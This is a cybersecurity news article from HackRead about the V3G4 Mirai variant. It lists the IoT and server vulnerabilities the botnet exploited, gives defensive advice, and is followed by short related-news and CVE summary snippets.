Headline
Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks
By Waqas The V3G4 malware was caught leveraging several vulnerabilities in IoT devices to spread its infection from July to December of 2022. This is a post from HackRead.com Read the original post: Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks
Like the original Mirai botnet, V3G4 infects IoT devices by exploiting default data login credentials such as usernames and passwords.
The IT security researchers at Palo Alto Networks’ Unit 42 have identified a new variant of the infamous Mirai malware, which was responsible for several large-scale DDoS attacks (Distributed Denial of Service attacks) on Dyn DNS in October 2016.
Dubbed V3G4 by researchers, it is a type of malware that specifically targets Internet of Things (IoT) devices. Like the original Mirai botnet, V3G4 infects IoT devices by exploiting default data login credentials such as usernames and passwords.
In the campaign tracked by Unit 42, one of the prime targets of the V3G4 malware has been exposed IP cameras. The malware uses the exposed servers and devices to create a powerful botnet, which can be used to launch DDoS attacks or perform other malicious activities, such as stealing data or installing additional malware.
According to Unit 42’s report, researchers observed the V3G4 malware leveraging several vulnerabilities to spread its infection from July to December of 2022. These vulnerabilities include the following:
CVE-2019-15107
Webmin Command Injection Vulnerability
CVE-2012-4869
FreePBX Elastix Remote Command Execution Vulnerability
CVE-2020-8515
DrayTek Vigor Remote Command Execution Vulnerability
CVE-2020-15415
DrayTek Vigor Remote Command Injection Vulnerability
CVE-2022-36267
Airspan AirSpot Remote Command Execution Vulnerability
CVE-2022-26134
Atlassian Confluence Remote Code Execution Vulnerability
CVE-2022-4257
C-Data Web Management System Command Injection Vulnerability
CVE-2017-5173
Geutebruck IP Cameras Remote Command Execution Vulnerability
CVE-2014-9727
FRITZ!Box Webcam Remote Command Execution Vulnerability
Gitorious Remote Command Execution Vulnerability
Mitel AWC Remote Command Execution Vulnerability
Spree Commerce Arbitrary Command Execution Vulnerability
FLIR Thermal Camera Remote Command Execution Vulnerability
Source: Unit 42
Researchers also noted that within the botnet client, there is a stop list of process names that it endeavours to eliminate by cross-checking the names of currently running processes on the targeted host. These process names are associated with other botnet malware families and have previously identified different variants of Mirai.
V3G4’s stop list.
This should not come as a surprise, as there have been several Mirai variants that have surfaced over the years. Some of them included MooBot, Demonbot, OMG, and several others.
The vulnerabilities mentioned above have less attack complexity than previously observed variants, but they maintain a critical security impact that can lead to remote code execution.
Palo Alto Networks – Unit 42
To protect against V3G4 and other IoT malware, it is important to follow best practices for securing IoT devices. This includes changing default usernames and passwords, keeping software up to date with the latest security patches, and disabling unnecessary services and protocols. Network segmentation can also help to contain the spread of malware if a device is infected.
- Cloudflare thwarts the largest DDoS attack
- EV Charging Stations at Risk of DoS Attacks
- Tor Network Hit By a Series of DDoS Attacks
- Tiny Mantis DDoS attacks powerful than Mirai
- New malware targeting IoT devices, Android TV
I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism
Related news
By Deeba Ahmed Another day, another Linux malware! This is a post from HackRead.com Read the original post: New Linux Malware Alert: ‘Spinning YARN’ Hits Docker, Other Key Apps
Iranian nation-state actors have been conducting password spray attacks against thousands of organizations globally between February and July 2023, new findings from Microsoft reveal. The tech giant, which is tracking the activity under the name Peach Sandstorm (formerly Holmium), said the adversary pursued organizations in the satellite, defense, and pharmaceutical sectors to likely facilitate
A new variant of the notorious Mirai botnet has been found leveraging several security vulnerabilities to propagate itself to Linux and IoT devices. Observed during the second half of 2022, the new version has been dubbed V3G4 by Palo Alto Networks Unit 42, which identified three different campaigns likely conducted by the same threat actor. "Once the vulnerable devices are compromised, they
A vulnerability was found in C-DATA Web Management System. It has been rated as critical. This issue affects some unknown processing of the file cgi-bin/jumpto.php of the component GET Parameter Handler. The manipulation of the argument hostname leads to argument injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214631.
AirSpot 5410 versions 0.3.4.1-4 and below suffer from an unauthenticated remote command injection vulnerability.
In Airspan AirSpot 5410 version 0.3.4.1-4 and under there exists a Unauthenticated remote command injection vulnerability. The ping functionality can be called without user authentication when crafting a malicious http request by injecting code in one of the parameters allowing for remote code execution. This vulnerability is exploited via the binary file /home/www/cgi-bin/diagnostics.cgi that accepts unauthenticated requests and unsanitized data. As a result, a malicious actor can craft a specific request and interact remotely with the device.
A recently patched critical security flaw in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads. In at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a crypto miner called z0miner
A sophisticated Chinese advanced persistent threat (APT) actor exploited a critical security vulnerability in Sophos' firewall product that came to light earlier this year to infiltrate an unnamed South Asian target as part of a highly-targeted attack. "The attacker implement[ed] an interesting web shell backdoor, create[d] a secondary form of persistence, and ultimately launch[ed] attacks
In response to a comment about the Prophet Mohammed, a hacktivist group in Malaysia has unleashed a wave of cyber attacks in India.
Microsoft has warned of APT groups and ransomware authors exploiting the now patched Confluence vulnerability. We take a look at the dangers. The post “Multiple adversaries” exploiting Confluence vulnerability, warns Microsoft appeared first on Malwarebytes Labs.
Confluence suffers from a pre-authentication remote code execution vulnerability that is leveraged via OGNL injection. All 7.4.17 versions before 7.18.1 are affected.
The vulnerability remains unpatched on many versions of the collaboration tool and has potential to create a SolarWinds-type scenario.
Atlassian on Friday rolled out fixes to address a critical security flaw affecting its Confluence Server and Data Center products that have come under active exploitation by threat actors to achieve remote code execution. Tracked as CVE-2022-26134, the issue is similar to CVE-2021-26084 — another security flaw the Australian software company patched in August 2021. Both relate to a case of
Cisco Talos is monitoring reports of an actively exploited zero-day vulnerability in Confluence Data Center and Server. Confluence is a Java-based corporate Wiki employed by numerous enterprises. At this time, it is confirmed that all supported versions of Confluence are affected by this... [[ This is only the beginning! Please visit the blog for the complete entry ]]
An remote code execution (RCE) vulnerability in all versions of the popular Confluence collaboration platform can be abused in credential harvesting, cyber espionage, and network backdoor attacks.
Atlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild. The Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as CVE-2022-26134. "Atlassian has been made aware of current active exploitation of a
An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.